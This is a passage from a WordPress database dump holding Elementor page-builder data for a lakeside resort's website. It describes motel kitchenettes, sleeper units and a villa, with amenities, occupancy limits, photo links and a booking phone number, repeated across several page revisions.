Smoking.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4bba88e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c9c91ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f96e083\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4157.jpg\",\"id\":468}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"a7e2877\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0172296\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4155.jpg\",\"id\":467},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"96c0fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1349,645,'_elementor_edit_mode','builder'),(1350,645,'_elementor_version','0.4'),(1351,645,'_elementor_data','[{\"id\":\"4e2861b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"01c17bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a7e9fc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong> Stay in a Motel Room \\u2013 <\\/strong><strong><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a>\\u00a0 <br \\/><\\/strong><\\/p><p><strong>All motel rooms are available nightly, weekly and long term.<\\/strong><\\/p><p><strong>We have motel units with kitchens \\u201cKitchenettes\\u201d<br \\/> and we have units without kitchens \\u201cSleepers\\u201d.<br \\/>or our lakeside Villa.<br \\/><\\/strong><\\/p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"50c4bfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e66d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Motel.jpg\",\"id\":302},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"640\",\"height\":\"300\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6542a16\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"23e9738\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"808cf47\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kitchenettes #1, 3, 5 &amp; 7<\\/strong><\\/p><p>Are 1 bedroom \\u2013 1 bathroom with 2 double beds Maximum people 4<\\/p><p>also included in a Kitchenette unit is:<br \\/> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"03f13de\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c025d32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e98a34\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4153.jpg\",\"id\":466}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"1d86d5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"015be59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4149.jpg\",\"id\":464}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"4985a47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5c5981a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4151.jpg\",\"id\":465},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7dad932\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"6cb5af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"641f976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Sleepers #2, #4 and #6<\\/strong><\\/p><p>Are one bedroom \\u2013 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br \\/> Maximum people 4.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9188508\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7961de2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a81ffee\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42011.jpg\",\"id\":541}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"2043fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"99dab09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN41971.jpg\",\"id\":539},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"19dbffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b0b6f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42001.jpg\",\"id\":540}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6ad5\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"c16586f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8137cdf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lakeside Villa #9<\\/strong><\\/p><p>Unit # 9 is one of the most popular units newly remodeled in 2015<br \\/> #9 has one Queen bed, and two single beds one bathroom<br \\/>Maximum people 4. No pets. No Smoking.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4bba88e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c9c91ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f96e083\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4157.jpg\",\"id\":468}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"a7e2877\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0172296\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4155.jpg\",\"id\":467},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"96c0fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1353,646,'_elementor_edit_mode','builder'),(1354,646,'_elementor_version','0.4'),(1355,646,'_elementor_data','[{\"id\":\"4e2861b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"01c17bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a7e9fc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong> Stay in a Motel Room \\u2013 <\\/strong><strong><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a>\\u00a0 <br \\/><\\/strong><\\/p><p><strong>All motel rooms are available nightly, weekly and long term.<\\/strong><\\/p><p><strong>We have motel units with kitchens \\u201cKitchenettes\\u201d<br \\/> and we have units without kitchens \\u201cSleepers\\u201d.<br \\/>or our lakeside Villa.<br \\/><\\/strong><\\/p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"50c4bfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e66d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Motel.jpg\",\"id\":302},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"640\",\"height\":\"300\"},\"align\":\"center\",\"image_border_border\":\"solid\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6542a16\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"23e9738\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"808cf47\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kitchenettes #1, 3, 5 &amp; 7<\\/strong><\\/p><p>Are 1 bedroom \\u2013 1 bathroom with 2 double beds Maximum people 4<\\/p><p>also included in a Kitchenette unit is:<br \\/> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"03f13de\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c025d32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e98a34\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4153.jpg\",\"id\":466}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"1d86d5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"015be59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4149.jpg\",\"id\":464}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"4985a47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5c5981a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4151.jpg\",\"id\":465},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7dad932\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"6cb5af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"641f976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Sleepers #2, #4 and #6<\\/strong><\\/p><p>Are one bedroom \\u2013 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br \\/> Maximum people 4.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9188508\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7961de2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a81ffee\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42011.jpg\",\"id\":541}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"2043fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"99dab09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN41971.jpg\",\"id\":539},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"19dbffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b0b6f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42001.jpg\",\"id\":540}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6ad5\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"c16586f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8137cdf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lakeside Villa #9<\\/strong><\\/p><p>Unit # 9 is one of the most popular units newly remodeled in 2015<br \\/> #9 has one Queen bed, and two single beds one bathroom<br \\/>Maximum people 4. No pets. No Smoking.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4bba88e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c9c91ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f96e083\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4157.jpg\",\"id\":468}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"a7e2877\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0172296\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4155.jpg\",\"id\":467},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"96c0fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1357,647,'_elementor_edit_mode','builder'),(1358,647,'_elementor_version','0.4'),(1359,647,'_elementor_data','[{\"id\":\"4e2861b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"01c17bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a7e9fc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong> Stay in a Motel Room \\u2013 <\\/strong><strong><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a>\\u00a0 <br \\/><\\/strong><\\/p><p><strong>All motel rooms are available nightly, weekly and long term.<\\/strong><\\/p><p><strong>We have motel units with kitchens \\u201cKitchenettes\\u201d<br \\/> and we have units without kitchens \\u201cSleepers\\u201d.<br \\/>or our Lakeside Villa.<br \\/><\\/strong><\\/p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"50c4bfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e66d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Motel.jpg\",\"id\":302},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"640\",\"height\":\"300\"},\"align\":\"center\",\"image_border_border\":\"solid\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6542a16\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"23e9738\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"808cf47\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kitchenettes #1, 3, 5 &amp; 7<\\/strong><\\/p><p>Are 1 bedroom \\u2013 1 bathroom with 2 double beds Maximum people 4<\\/p><p>also included in a Kitchenette unit is:<br \\/> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"03f13de\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c025d32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e98a34\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4153.jpg\",\"id\":466}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"1d86d5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"015be59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4149.jpg\",\"id\":464}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"4985a47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5c5981a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4151.jpg\",\"id\":465},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7dad932\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"6cb5af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"641f976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Sleepers #2, #4 and #6<\\/strong><\\/p><p>Are one bedroom \\u2013 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br \\/> Maximum people 4.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9188508\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7961de2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a81ffee\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42011.jpg\",\"id\":541}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"2043fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"99dab09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN41971.jpg\",\"id\":539},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"19dbffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b0b6f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42001.jpg\",\"id\":540}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6ad5\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"c16586f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8137cdf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lakeside Villa #9<\\/strong><\\/p><p>Unit # 9 is one of the most popular units newly remodeled in 2015<br \\/> #9 has one Queen bed, and two single beds one bathroom<br \\/>Maximum people 4. No pets. No Smoking.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4bba88e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c9c91ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f96e083\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4157.jpg\",\"id\":468}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"a7e2877\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0172296\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4155.jpg\",\"id\":467},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"96c0fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1376,37,'_elementor_edit_mode','builder'),(1381,37,'_elementor_version','2.5.12'),(1382,37,'_elementor_data','[{\"id\":\"9817a90\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c46e193\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"7f1393b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c0654af\"}]},\"elements\":[{\"id\":\"e424741\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5a4d7fb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3b9a49c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"65f4100\"}]},\"elements\":[{\"id\":\"466f112\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>All of our <a href=\\\"http:\\/\\/ashbyresort.com\\/motel\\/\\\">Motel rooms<\\/a>, <a href=\\\"http:\\/\\/ashbyresort.com\\/cabins\\/\\\">Cabins<\\/a> and <a href=\\\"http:\\/\\/ashbyresort.com\\/large-cabins\\/\\\">New Cabins<\\/a> are lakeside on level grounds with a park like setting that is even more captivating during our beautiful sunsets. We also have <a href=\\\"http:\\/\\/ashbyresort.com\\/campgrounds\\/\\\">Tent and RV camping sites<\\/a> available.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e1f964\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1a66592\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0f83537\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d3038b8\"}]},\"elements\":[{\"id\":\"da0325a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ae8dc82\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"f0cb7d3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bec433c\"}]},\"elements\":[{\"id\":\"373f2ba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSC00168.jpg\",\"id\":112},\"caption\":\"MOTEL KITCHENETTES & SLEEPERS\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/motel\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6894a84\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8b813b8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"691f3cb\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d6b0346\"}]},\"elements\":[{\"id\":\"c4107d6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-008.jpg\",\"id\":287},\"caption\":\"CABINS\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/cabins\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5fb2129\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0392b17\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"16f5fd8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f6c95fc\"}]},\"elements\":[{\"id\":\"4d11d8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3477.jpg\",\"id\":354},\"caption\":\"NEWER 